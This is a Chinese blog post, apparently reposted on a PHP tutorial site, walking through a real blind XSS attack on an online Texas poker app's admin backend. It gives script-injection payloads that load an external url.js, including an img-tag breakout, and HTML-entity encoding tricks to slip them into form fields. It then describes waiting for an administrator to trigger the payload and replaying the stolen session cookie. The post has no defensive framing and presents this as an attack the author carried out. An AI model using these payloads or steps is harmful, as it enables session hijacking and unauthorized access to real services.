好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

XSS盲打德克萨斯扑克 - 网站安全 - 自学php

0x00 概述 XSS盲打德克萨斯扑克一家公司的..N多dicuzs、phpwind社区、ssn社区人人网等都在玩这个应用。。据说年盈利上亿啊啊啊啊啊啊。。。。 0x01 简介 利用xss打入后台盗取cookie。。普及为主,内容可能有点罗嗦,包涵 0x02 配置并编译 一个xss脚本客户端

0x03 实战应用 我玩德州牌可是高手,比赛啥的经常打第一名的,哈哈。只是这系统里的一些用户太二笔,TMD瞎so,导致我基本天天输光,有些b花钱买了不少金币。。。哎,虽然是游戏,但也上瘾的。 找口: 插入xss,这里大家插入时一定要注意,要温柔点,尽量在不破坏表单展现的情况下插入。。 可以自己在本地模拟写好代码 类似这里出现的属性text那我们xss最好不要 "/><script src=url.js></script><....这种常规写法,直接写入<script src=url.js></script>即可。 文本插入到数据库,读取一般也直接读取的,很少有后台从数据库读取数据还过滤处理下。。。 为img标签那就可以"/><script src=url.js></script><..先结束前面标签后面在结束或注释掉,为了保证图片不显示成X框,建议上传个图得到地址后:图片地址.jpg"/><script src=url.js></script>这样插入。。 就完美了。 但有些人又问到了,表单里这样插入那么就成了<img src="图片地址.jpg"/><script src=url.js></script>    那前面"/> 都结束了后面的怎么可能提交进去。 这里大家需要编码下,推荐http://app.baidu测试数据/app/enter?appid=280383 html十进制转义下,就成了包含了。 提交成功后等鱼儿上钩: 不一会儿。。: 然后chrome cookie模拟器添加cookie: 至此告一段落。总结:不要死板瞎插,type=hidden属性多关注

查看更多关于XSS盲打德克萨斯扑克 - 网站安全 - 自学php的详细内容...

  阅读:45次